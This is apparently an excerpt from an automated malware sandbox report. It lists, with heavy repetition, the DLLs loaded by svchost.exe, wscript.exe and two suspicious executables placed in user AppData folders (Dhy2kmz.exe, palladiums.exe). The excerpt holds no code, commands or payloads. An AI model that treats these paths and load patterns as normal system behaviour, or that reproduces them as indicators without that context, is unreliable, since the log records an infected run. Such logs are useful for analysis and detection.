                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeSection loaded: kernel.appcore.dll
